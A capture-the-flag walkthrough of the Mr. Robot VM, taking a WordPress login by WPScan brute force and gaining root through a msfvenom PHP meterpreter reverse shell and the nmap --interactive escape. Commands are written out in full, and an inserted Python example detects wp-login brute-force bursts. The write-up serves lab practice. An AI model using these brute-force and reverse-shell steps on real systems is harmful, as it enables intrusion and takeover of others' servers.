Mr. Robot CTF Walkthrough


To start, I use netdiscover to find the IP address of the VM. Once I have found the IP address, I use nmap to scan for open ports and services.


After the scan completes, it shows ports 22, 80 and 443, so I try seeing what the browser will tell us.


The webpage is very well made. We are greeted with a “Hello friend” message. Next I use Nikto. Nikto is a web server assessment tool. It is designed to find various default and insecure files, configurations and programs on any type of web server.
nikto -h


Given the name Mr. Robot, and also the Nikto results, I look up the robots.txt file in the web browser.


Once opened, we see a text file and a dictionary file. I use wget to save the file to my PC, then open it to see the results.


As we can see we have our first flag!

Now it's time to see what fsocity.dic has in store for us.


Once opened, I see a very long list of words, which makes it a wordlist of some sort. As I look through more Nikto results, I notice a wp-login page. Knowing this is a WordPress site, I visit the URL and am prompted with an admin login page.


Just to start, I try the default username and password admin:admin and get negative results. I did notice the error for an invalid username. Remembering that the CTF is called Mr. Robot, I try the main character's first name, Elliot. I then get an incorrect-password result for the username Elliot.


I tried many different passwords to try to get into the webpage, with no luck. The next step I go for is brute-forcing the login with WPScan.
wpscan --url --wordlist /YOUR DIRECTORY/fsocity.dic --username Elliot


After 5 hours and 17 minutes according to the elapsed time, I finally get the password I need to log in.
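From the defender's side, a multi-hour wordlist run like the one above is loud in the web server's access log. The following is an added example, not part of the original walkthrough: it flags source IPs that send a burst of failed wp-login.php POSTs, and separately marks a login that succeeds after many failures. The log lines, IP addresses, threshold and window are constructed for illustration, and the status-code logic assumes stock WordPress behaviour (200 on a failed login, 302 on success).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

def _line(ip, sec, status):  # builds one constructed "combined"-format log line
    return (f'{ip} - - [12/Mar/2024:10:00:{sec:02d} +0000] '
            f'"POST /wp-login.php HTTP/1.1" {status} 3120 "-" "-"')

# Constructed sample (documentation IP ranges), not taken from the CTF VM.
SAMPLE_LOG = "\n".join(
    [_line("192.0.2.10", s, 200) for s in range(6)]      # six failed guesses
    + [_line("192.0.2.10", 6, 302)]                      # then a successful login
    + [_line("198.51.100.7", 10, 200), _line("198.51.100.7", 20, 302)]  # one typo
    + ['203.0.113.5 - - [12/Mar/2024:10:00:30 +0000] '
       '"GET /robots.txt HTTP/1.1" 200 41 "-" "-"']      # unrelated request
)

LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Flag source IPs whose wp-login.php POSTs look like password guessing.

    Assumes stock WordPress: a failed login answers 200, a successful one 302.
    """
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events[m["ip"]].append((ts, int(m["status"])))
    findings = {}
    for ip, seq in events.items():
        seq.sort()
        fails = [ts for ts, status in seq if status == 200]
        burst, start = False, 0
        for end in range(len(fails)):            # sliding window over failures
            while fails[end] - fails[start] > window:
                start += 1
            burst = burst or (end - start + 1 >= threshold)
        seen, success = 0, False                 # 302 after many failures: likely hit
        for _, status in seq:
            seen += status == 200
            success = success or (status == 302 and seen >= threshold)
        if burst or success:
            findings[ip] = {"failures": len(fails), "burst": burst,
                            "success_after_failures": success}
    return findings

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

An IP reported with success_after_failures set is the case to treat as a credential compromise rather than just noise.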


Now I'm logged in and have access. Now it's time to make a shell to gain further access.


I make the code using msfvenom with the following command:
msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw
Copy the code from <?php to die(); and paste it into the template (and save it).


Once it is uploaded in the PHP, I open Metasploit to start a session.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost
set lport 4444


Now after a visit to I get a meterpreter session. To obtain the shell, type:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/
python /tmp/
This now gives you access.
Using the ls -las command gives the user information.
cd /home takes you to the home folder
cd robot takes you to the robot folder


Once I use the ls command I see the clue for the 2nd flag. So I cat the txt file.
cat key-2-of-3.txt
Permission denied
I was able to ls what is inside the txt file. So I move on to the next file listed.
cat password.raw-md5
Once completed, I have another clue for flag 2. It's an MD5 hash. So next I need to crack the hash.


The value will translate to abcdefghijklmnopqrstuvwxyz
Next I get super user rights to robot.
Using the translation I got from the MD5 hash, I have access.
I do another
ls -lsa
Then cat the key txt file
cat key-2-of-3.txt
Now I have the 2nd flag.


Next I use the nmap interactive shell to get the 3rd and final flag.
Nmap supported an option called “interactive.” With this option, users were able to execute shell commands by using an nmap “shell” (interactive shell).
nmap --interactive
With the above command you will enter nmap, then type:
id (to know the users)
cd /root (lets you enter root)
Once you have entered root, type:
ls -lsa
cat key-3-of-3.txt